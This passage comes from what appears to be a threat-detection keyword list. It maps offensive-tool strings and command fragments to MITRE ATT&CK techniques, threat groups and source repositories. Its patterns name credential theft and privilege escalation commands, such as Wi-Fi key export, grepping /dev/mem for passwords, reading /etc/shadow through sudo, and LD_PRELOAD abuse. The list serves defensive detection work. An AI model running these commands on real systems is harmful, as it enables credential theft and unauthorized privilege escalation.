TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*StealPowerAutomateToken-C4E7B7DA-54E4-49AB-B634-FCCD77C65025.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*Sticky-Keys-Slayer*","offensive_tool_keyword","Sticky-Keys-Slayer","Scans for accessibility tools backdoors via RDP","T1078 - T1015 - T1203","TA0003 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/linuz/Sticky-Keys-Slayer","1","1","N/A","N/A","4","319","80","2018-03-16T15:59:41Z","2016-08-06T18:55:28Z" +"*StickyNotesExtract.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*stinger_client -*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","0","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*stinger_client.py*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*stinger_server.exe*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*stopdaisy*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*StopInveigh*","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-stop-keylogger*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"*stop-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with 
post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*stormshadow07*","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","1","N/A","N/A","9","867","179","2020-04-28T20:17:54Z","2018-02-17T11:46:40Z" +"*STRING firefox about:logins*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. 
Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*String netsh wlan export profile key=clear*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*strings -n * /dev/mem | grep -i pass*","greyware_tool_keyword","grep","search for passwords in memory and core dumps","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*strip_bof.ps1*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus 
- FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*strip2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*strip-bof -Path *","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*StrongLoader_x64.exe*","offensive_tool_keyword","bruteratel","A 
Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*struts_ext_v2.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" +"*su rootz*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" +"*subbrute*","offensive_tool_keyword","subbrute","SubBrute is a community driven project with the goal of creating the fastest. and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting. This design also provides a layer of anonymity. 
as SubBrute does not send traffic directly to the targets name servers.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/TheRook/subbrute","1","1","N/A","N/A","10","3151","653","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z" +"*subdomain_takeovers.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*subdomains-100.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-1000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-10000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-500.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-top1million-110000.txt*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - 
TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*subdomains-top1million-20000.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*subdomains-uk-1000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-uk-500.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomain-wordlist.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*subfinder -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*subfinder -silent -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - 
T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*subfinder --silent*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*subfinder*","offensive_tool_keyword","subfinder","SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/subfinder/subfinder","1","0","N/A","N/A","10","8302","1128","2023-10-02T15:13:41Z","2018-03-31T09:44:57Z" +"*sublist3r -v -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*Sublist3r*","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. 
The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","10","8700","2020","2023-10-01T21:58:10Z","2015-12-15T00:55:25Z" +"*Suborner.exe*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" +"*Suborner-master.zip*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" +"*Successfully connected* spawning shell?*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*Successfully cracked account password*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*Successfully dumped SAM and SYSTEM*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" +"*sudo apache2 -f /etc/shadow*","greyware_tool_keyword","sudo","access sensitive files by abusing sudo permissions","T1548.001 - T1059.004","TA0004 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*sudo bloodhound*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*sudo LD_LIBRARY_PATH=. 
apache2*","greyware_tool_keyword","sudo","abusing LD_LIBRARY_PATH sudo option to escalade privilege","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*sudo LD_PRELOAD=/tmp/preload.so find*","greyware_tool_keyword","sudo","abusinf LD_PREDLOAD option to escalade privilege","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*sudo -nS id' && lse_sudo=true*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*sudo rmmod -r*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*sudo tmux new -s icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*sudo_inject*","offensive_tool_keyword","sudo_inject","Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo token","T1055 - T1548.001 - T1059.002","TA0002 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nongiach/sudo_inject","1","1","N/A","N/A","7","649","122","2019-04-14T07:43:35Z","2019-03-24T22:06:22Z" +"*SUDO_KILLER*","offensive_tool_keyword","SUDO_KILLER","sudo exploitation #Abusing sudo #Exploiting Sudo #Linux Privilege Escalation #OSCP If you like the tool and for my personal motivation so as to develop other tools please a +1 star The tool can be used by pentesters. system admins. CTF players. students. 
System Auditors and trolls :).","T1078 - T1059 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/TH3xACE/SUDO_KILLER","1","1","N/A","N/A","10","1977","244","2023-08-02T08:53:48Z","2018-12-07T21:08:02Z" +"*sudomy.git*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*sudopwn.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*SUID3NUM -*","offensive_tool_keyword","SUID3NUM","A standalone python2/3 script which utilizes pythons built-in modules to find SUID bins. separate default bins from custom bins. cross-match those with bins in GTFO Bins repository & auto-exploit those. all with colors! ( ?? ?? 
